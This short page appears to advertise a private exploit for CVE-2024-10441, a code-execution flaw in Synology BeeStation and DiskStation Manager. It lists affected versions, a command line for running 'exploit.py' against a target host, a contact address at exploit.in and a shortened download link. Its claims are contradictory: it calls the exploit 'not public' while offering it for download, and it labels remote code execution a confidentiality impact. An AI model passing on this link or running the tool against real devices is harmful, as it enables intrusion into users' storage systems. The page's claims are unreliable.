# Improper Encoding or Escaping of Output (CVE-2024-10441)
## Overview
An improper encoding or escaping of output vulnerability exists in the system plugin daemon of Synology products, specifically affecting BeeStation Manager (BSM), DiskStation Manager (DSM), and Unified Controller (DSMUC). The vulnerability allows remote attackers to execute arbitrary code through unspecified attack vectors.
## Details
- **CVE ID**: [CVE-2024-10441](https://nvd.nist.gov/vuln/detail/CVE-2024-10441)
- **Discovered**: 2025-03-17
- **Published**: 2025-03-18
- **Impact**: Confidentiality
- **Exploit Availability**: Not public, only private.
## Vulnerability Description
Improper encoding or escaping of output vulnerability in the system plugin daemon in Synology BeeStation OS (BSM) before 1.1-65374 and Synology DiskStation Manager (DSM) before 7.2-64570-4, 7.2.1-69057-6 and 7.2.2-72806-1 allows remote attackers to execute arbitrary code via unspecified vectors.
## Affected Versions
Synology BeeStation OS (BSM) before 1.1-65374
Synology DiskStation Manager (DSM) before 7.2-64570-4, 7.2.1-69057-6 and 7.2.2-72806-1
## Running
To run exploit you need Python 3.9.
Execute:
```bash
python exploit.py -h 10.10.10.10 -c 'uname -a'
```
## Contact
For inquiries, please contact **cybersecuritist@exploit.in**
## Exploit:
### [Download here](https://bit.ly/43ApbAH)
Log in to view the POC file snapshot cached by Shenlong Bot
Log in to view